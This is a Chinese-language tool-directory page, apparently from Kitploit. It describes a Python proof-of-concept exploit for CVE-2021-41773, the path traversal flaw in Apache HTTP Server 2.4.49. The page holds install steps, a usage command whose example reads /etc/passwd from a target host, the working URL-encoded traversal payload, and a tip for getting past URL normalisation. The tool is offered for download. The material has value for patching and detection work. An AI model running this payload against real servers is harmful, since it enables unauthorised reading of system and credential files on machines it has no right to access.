Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2021-41773 — Python 漏洞利用工具 CVE-2021-41773 - Apache HTTP Server 2.4.49 路径遍历漏洞 | Kitploit
工具/GitHubGitHub/blu3ming/poc-cve-2021-41773
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubblu3ming/poc-cve-2021-41773

PoC-CVE-2021-41773

Python 漏洞利用工具 CVE-2021-41773 - Apache HTTP Server 2.4.49 路径遍历漏洞

查看仓库
41年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773 Apache HTTP Server 路径遍历漏洞利用

一个针对CVE-2021-41773的Python利用工具,这是Apache HTTP Server 2.4.49中的一个路径遍历漏洞,允许从服务器读取任意文件。

漏洞详情

CVE-2021-41773 是Apache HTTP Server 2.4.49中的一个路径遍历漏洞,由于对用户提供的路径验证不当导致。攻击者可以通过使用URL编码的路径遍历序列读取文档根目录之外的文件。

  • CVSS 评分: 7.5 (高危)
  • 受影响版本: Apache HTTP Server 2.4.49
  • 攻击向量: 远程,无需认证

安装

git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt

使用

python3 cve-2021-41773.py -t <target> -f <file_path>

参数

  • -t, --target: 目标URL (根据需要包含协议和端口)
  • -f, --file: 从服务器读取的文件路径

示例

# 读取 /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

成功利用

工作原理

该利用工具使用URL编码的路径遍历序列(.%2e/%2e%2e/)来绕过Apache的路径验证:

  1. 存在漏洞的Apache版本未能正确解码和验证路径
  2. URL编码的点(.%2e)绕过了初始安全检查
  3. 服务器在解码后处理路径遍历,从而允许文件访问

关键之处在于使用urllib3.PoolManager()而不是requests.get(),以防止自动的URL规范化导致利用失败。

技术细节

# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}

这相当于:

/cgi-bin/../../../../{target_file}

参考

  • CVE-2021-41773 - MITRE
  • Apache HTTP Server 安全公告
  • NVD - CVE-2021-41773
下载工具